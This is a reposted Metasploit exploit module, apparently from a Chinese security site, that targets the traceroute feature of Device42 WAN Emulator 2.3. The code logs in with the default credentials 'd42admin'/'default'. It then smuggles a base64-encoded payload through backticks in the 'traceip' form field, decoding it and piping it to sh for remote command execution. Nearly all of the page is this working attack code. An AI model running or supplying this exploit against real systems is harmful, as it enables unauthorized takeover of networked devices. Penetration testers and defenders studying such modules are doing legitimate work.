首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Device42 WAN Emulator 2.3 Traceroute Command Injection
来源:metasploit.com 作者:Perry 发布时间:2014-11-27  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WAN Emulator v2.3 Command Execution',
      'Description'    => %q{
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Author'         =>
        [
          'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
        ],
      'References'     =>
        [
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "",
          'DisableNops' => true,
          #'Compat'      =>
          #  {
          #    'PayloadType' => 'cmd',
          #    'RequiredCmd' => 'generic netcat netcat-e',
          #  }
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => 'none'
        },
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 12 2012'
    ))
  end
  
  def exploit
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
    })
  
    cookie = res.headers['Set-Cookie']
  
    csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
  
    post = {
      'csrfmiddlewaretoken' => csrf,
      'username' => 'd42admin',
      'password' => 'default',
      'next' => '/'
    }
  
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
      'vars_post' => post,
      'method' => 'POST',
      'cookie' => cookie
    })
  
    unless res.code == 302
      fail_with("auth failed")
    end
  
    cookie = res.headers['Set-Cookie']
  
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ping/'),
      'cookie' => cookie
    })
  
    cookie = res.headers['Set-Cookie']
    csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
  
    post = {
      'csrfmiddlewaretoken' => csrf,
      'traceip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
      'trace' => ''
    }
  
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ping/'),
      'method' => "POST",
      'vars_post' => post,
      'cookie' => cookie
    })
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Android WAPPushManager - SQL I
·Device42 WAN Emulator 2.3 Ping
·Elipse E3 HTTP Denial of Servi
·Slider Revolution/Showbiz Pro
·Mini-stream RM-MP3 Converter 3
·Android Settings Pendingintent
·Pandora FMS SQLi Remote Code E
·Android SMS Resend Vulnerabili
·Sniffit Root Shell
·KMPlayer 3.9.1.130 Denial Of S
·WordPress 4.0 Denial Of Servic
·PHP 5.x / Bash Shellshock Proo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved